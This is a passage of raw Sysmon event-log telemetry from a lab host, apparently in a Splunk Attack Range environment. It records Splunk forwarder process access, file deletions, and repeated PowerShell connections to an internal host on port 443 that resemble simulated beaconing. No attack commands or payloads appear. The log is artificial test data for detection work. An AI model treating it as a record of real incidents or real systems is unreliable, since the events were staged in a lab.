Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.778{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D31314826526BD7D3791E391EBABF78E,SHA256=774EA689F93DFEEFC5CC61BFD219F9B198C326A4392867DACB8E8AC8B1A7BC85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.314{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A16B-6140-9356-04000000C801}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.312{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.312{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.312{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.312{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.311{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A16B-6140-9356-04000000C801}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.311{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A16B-6140-9356-04000000C801}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.295{B81B27B7-A16B-6140-9356-04000000C801}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:39.194{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E0CC567556DAC45C8E7A0C69E166025,SHA256=E9F7D9DFEB46E965266AEB20ACE2786DE5C9E74CE7B5387D0817E8CD69B3D6CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:10.461{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50588-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:09.915{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50587-false10.0.1.12-8000- 23542300x800000000000000036497864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:40.331{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30839BB7FE946A943CB4344C61DCD932,SHA256=A4D5012C2A9ADDA88BA56C70ADECD614809D1CC67FA387838BE1D2C337506FBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:40.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EF33376760E25B7606A87BFEAE2823C,SHA256=51825BC68A0578726701D7A954B15E73BD47DC82DF34F15996FB4135D881C396,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:41.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C4AFFACCFFF34D1F2979BE2CCAF735,SHA256=C4651459EA29B515CD81C0429D2B0A01D08BBF034411E07200C3F2878167125A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:42.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44646FDBCD3B74C220777CFFB0258867,SHA256=ED8984E13FD81C33D5E72EBBFE16F4E0FAD2CE9BD5C907843AF0D1F2F5EBD961,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:43.290{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF87A9128BBBA6E552D3EC2A270CF05A,SHA256=A6D89379F661747D20A2B6887046DE906B13D4CD8B5912E1343E976495E39B7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:44.807{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CCDC73E649D6D0516D28A748F36F785F,SHA256=FB7F89F9A369D6807DDA67EAF43AA49E12C42ADC8A809EBC5C5B13A8A8CC56E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:44.342{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:44.342{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=734E88FA48CCB4109FE88EA78FA4D808,SHA256=36A5CF0C8EBDD8A53534C59B0C9A8B937985E3D23FC159FCEFD4528CAADD556C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:44.307{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=549F6695589234473AE4C4620E575C4A,SHA256=F5B838BB9CA265D6AC319EF86E6BA2D2E06AEC4E3DDA0A5C058B10B72A2E0EE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:45.340{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E6F86946AD7D918E00FBD43CF636477,SHA256=E9CD67D9CFF277E2664D1BE298AB9A98ADB935D54C53EF37AA96DC7350271D39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:46.371{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5958128997E748D00DE106F968DD516,SHA256=86DEB74725B9F235EACF47ED738C85BB58AF8155868F31BF3D4CA1A957997B11,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:15.475{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50589-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:47.403{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60AE0B6A16E8E9D58E385EE5284F6BE,SHA256=2A939196DE9D954B2D9129A61F89D53D76C16B2CAE02D39BD27C13FF181E8027,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:15.927{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50590-false10.0.1.12-8000- 23542300x800000000000000036497879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:48.421{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C8A82C4212798AA8F9CD8E868D045C2,SHA256=580AD84B088F686C65A1B01008D2FA652123CBCB6045D76518FA39ED73777605,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:49.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A4EDCF0A5E52BEB17F18E66976873F35,SHA256=4DC5E90DEAA0D6E63D0682E9837F4FD94B759C1413482C1D4C36164B2BA4AD31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:49.436{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE9D859AE2CEA81674047957386627FD,SHA256=12EC4D85B5CDF51BD8B5A03C45D6505794BCE30B1448A123027F2A35B4C6625F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:50.466{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=160422B570212DC951154804AEF407FF,SHA256=4A5F3D7CCA3C1A08BE157C8B6106D3D670D5C40D99EF390AA3961B288032B2F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.485{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50591-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:51.480{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78DFF28931A6C28F6BC687F5182C09F3,SHA256=08C0C2C9BA8AE1202F5D7112AB858EAC9285664472787C4B5021446C37C34C4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:52.497{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A545DC176C04779AF21767E6F637DE2D,SHA256=37BE3A2B1F673DA8FBD2A11EDE35A847A6C2426F49DE5CBFBB7D5D06424488D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:21.905{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50592-false10.0.1.12-8000- 23542300x800000000000000036497887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:53.499{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B26D7CEDDF41CC1F1CB37228682C299B,SHA256=6EA309C63CFE3814464CCFD7CEB5E8E58C23E227800FC2B99216C55ADEECC7FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:54.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AB461434D582237D76C8CB2156537FA,SHA256=DA500C6D7AFEB22C76E978E66D50948EDFEAF6EE45932DAA00BA015AC1C17D96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:55.927{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8F1FB5324D13E6F63461C33F621402EC,SHA256=87EDEA4B8981B9151FADFC1E712A0FA092231928BC2564712EBE441DFAAC7DD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:55.559{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8555C6EFBCC91ECC6C45DCC8D31A382,SHA256=C4886A3741FA4349C9A056CE1C3583A4A4D947342DAE8E3832E2BD65603B1C83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:56.574{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F39168CEB682889948DE87218B720279,SHA256=5F1385F27A6A0C1994EE4BF9ABCC86EB5BA5262DC597A90C6A2E10358F803B88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:26.499{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50593-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:56.294{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a351177.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:57.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=089ED9A9E693A33428CC42F053084A06,SHA256=C23427AC84B9E318362317BA2FD1CF6D6D037827AC0C28CC428C8BA76769158A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:58.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AE9148B9526D09A3F9FE2DCEA4239F4,SHA256=B9FA410794D1A4F8DB3878F535BF80E69190F1A3C78D79DFEB4CB6EF6FFCFC8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.928{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50594-false10.0.1.12-8000- 23542300x800000000000000036497929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 